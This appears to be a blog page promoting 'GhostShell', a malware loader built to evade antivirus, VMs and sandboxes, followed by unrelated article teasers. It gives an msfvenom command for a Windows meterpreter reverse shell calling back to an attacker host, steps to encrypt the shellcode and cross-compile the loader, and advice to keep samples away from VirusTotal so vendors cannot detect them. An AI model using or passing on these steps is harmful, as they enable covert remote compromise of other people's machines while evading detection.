GhostShell is a Malware indetectable, with AV bypass techniques, anti-disassembly, etc. In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I’m not responsible for your actions.
Attention!!!
To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option “Do not send my sample to non-affiliated third parties”, as in the example below.
Also Read – Faraday : Collaborative Penetration Test & Vulnerability Management Platform
Bypass Techniques
Generating the Shellcode
To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c
, copy the shellcode generated and encrypt it.
./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""
How to compile for Windows on Linux?
To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64
, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…
Introduction As cyber threats grow more sophisticated, organizations need more than just firewalls and antivirus…
Introduction When it comes to cybersecurity and ethical hacking, one of the most effective ways…
Introduction In the world of cybersecurity, knowledge is power. One of the most powerful skillsets…
Introduction In the vast ocean of the internet, the most powerful tool you already have…